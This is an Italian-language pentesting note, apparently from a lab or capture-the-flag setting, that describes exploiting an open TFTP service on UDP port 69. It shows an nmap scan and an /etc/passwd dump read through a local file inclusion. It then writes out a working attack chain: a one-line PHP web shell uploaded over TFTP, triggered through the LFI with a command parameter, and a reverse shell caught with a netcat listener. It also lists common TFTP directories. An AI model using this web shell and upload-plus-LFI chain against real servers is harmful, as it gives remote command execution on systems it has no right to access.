Quartz 4

TFTP

2 min read

tags: TFTP TFTP_RCE TFTP_UDP

Quando una macchina avversaria utilizza il servizio Tftp che in genere si trova sulla porta UDP 69:

sudo nmap -sU -p 69 10.129.44.197
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-05 15:04 CET
Nmap scan report for 10.129.44.197
Host is up (0.049s latency).
 
PORT   STATE         SERVICE
69/udp open|filtered tftp
 
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds

Possiamo anche scovarlo tramite una LFI e la lettura del file /etc/passwd:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false mike:x:1000:1000:mike:/home/mike:/bin/bash tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin'

Possiamo ottenere una RCE nel seguente modo:

Prima ci costruiamo un file con dentro un payload per RCE:

<?php system($_GET['cmd']); ?>

Poi ci scarichiamo il programma tftp e lo carichiamo sulla macchina vittima nel seguente modo:

 
sudo apt install tftp-hpa
 
tftp <indirizzoIP>
 
> put shell.php

Ora se abbiamo la possibilità di sfruttare una LFI la possiamo attivare andando al seguente indirizzo:

http://10.129.44.197/?file=/var/lib/tftpboot/shell.php&cmd=id

Come una RCE possiamo anche caricare una reverse shell tipo quella di presente a questo indirizzo, la carichiamo e ci mettiamo in ascolto:

 
tftp <indirizzoIP>
 
> put shell.php
 
nc -lvnp 5555
 
#Poi andiamo al seguente indirizzo
 
http://10.129.44.197/?file=/var/lib/tftpboot/shell.php

Altri percorsi comuni sono:

  • /var/lib/tftpboot/ (Standard Debian/Ubuntu)

  • /srv/tftp/ (Alternativa molto comune)

  • /tftpboot/ (Comune su vecchi sistemi o RedHat)

  • /var/tftp/

  • /usr/local/tftp/

Ma in ogni caso è sempre meglio leggere il file /etc/passwd dove è presente il percorso anche se customizzato, anche perchè senza LFI questo attacco può fare poco.

Graph View